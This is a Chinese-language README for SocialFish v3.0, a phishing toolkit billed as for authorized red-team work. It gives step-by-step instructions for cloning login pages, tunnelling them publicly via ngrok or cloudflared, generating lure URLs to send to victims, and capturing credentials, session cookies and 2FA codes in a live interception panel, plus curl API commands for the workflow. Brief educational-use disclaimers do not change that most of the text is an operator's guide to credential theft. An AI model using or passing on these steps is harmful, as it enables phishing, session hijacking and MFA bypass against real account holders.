现代动态钓鱼工具包,适用于授权的红队演练。克隆登录页面,捕获凭据、Cookies和2FA验证码,配有实时操作面板和隧道支持。
SocialFish v3.0 带来了克隆现代登录页面、捕获 Cookie 以及通过实时操作面板拦截 2FA 验证码的强大新功能。
python setup.py
这将:
pip install -r requirements.txt
playwright install chromium
python SocialFish.py admin password
然后访问:http://localhost:5000/neptune
创建模板
/templates → 新建模板 → 输入目标 URL
设置隧道(可选,用于远程测试)
点击 "Tunnel" → 选择 ngrok/cloudflared → 授权
生成诱饵 URL
点击 "Lure" → 复制不可猜测的 URL
发送给受害者
在邮件、消息等中分发诱饵 URL
实时监控
/sessions → 查看捕获的凭据、Cookie、OTP 验证码
/admin/otp_panel.html → 拦截与注入 2FA 验证码
both(凭据 + Cookie)、login(仅凭据)、cookies(仅会话)适用于任何使用以下技术的登录页面:
# 列出模板
curl http://localhost:5000/templates
# 生成诱饵 URL
curl -X POST http://localhost:5000/lure/generate \
-d "template_id=1"
# 查看会话
curl http://localhost:5000/session/1
# 设置
python setup.py # 交互式设置
# 隧道
python core/tunnel_manager.py setup
python core/tunnel_manager.py start --type ngrok
# 数据库
python core/db_migration.py
SocialFish/
├── SocialFish.py # 主 Flask 应用
├── setup.py # 交互式设置向导
├── FEATURES_v3.md # 功能文档
├── IMPLEMENTATION_SUMMARY.md # 技术细节
├── core/
│ ├── recorder_playwright.py # 浏览器自动化
│ ├── cookie_inspector.py # Cookie 分析
│ ├── tunnel_manager.py # 隧道支持
│ ├── db_migration.py # 数据库模式
│ └── ... (其他模块)
└── templates/
└── admin/
├── templates.html # 模板库界面
├── otp_panel.html # OTP 拦截界面
├── sessions.html # 会话管理界面
└── ... (其他模板)
⚠️ 仅限教育用途
详见 CODE_OF_CONDUCT.md 和 LICENSE
寻找移动控制器?查看 SocialFishMobile
仅用于教育目的
使用 SocialFish 的完全责任由最终用户承担。开发者不承担任何责任,也不对因使用本程序造成的任何误用或损害负责。
"免责声明:在任何情况下,版权持有人或贡献者均不对任何直接、间接、附带、特殊、惩戒性或后果性损害(包括但不限于获取替代商品或服务;使用、数据或利润损失;或业务中断)承担责任,无论基于何种责任理论(合同、严格责任或侵权(包括过失)),即使已被告知可能发生此类损害。"
摘自 LICENSE
使用 Docker 运行:
docker compose up
状态:已做好生产准备,可用于授权安全测试和红队演练
我们鼓励您为 SocialFish 做出贡献!请查阅 Contributing to SocialFish 指南以了解操作规范。加入我们!
@carinamary2448 - https://github.com/carinamary2448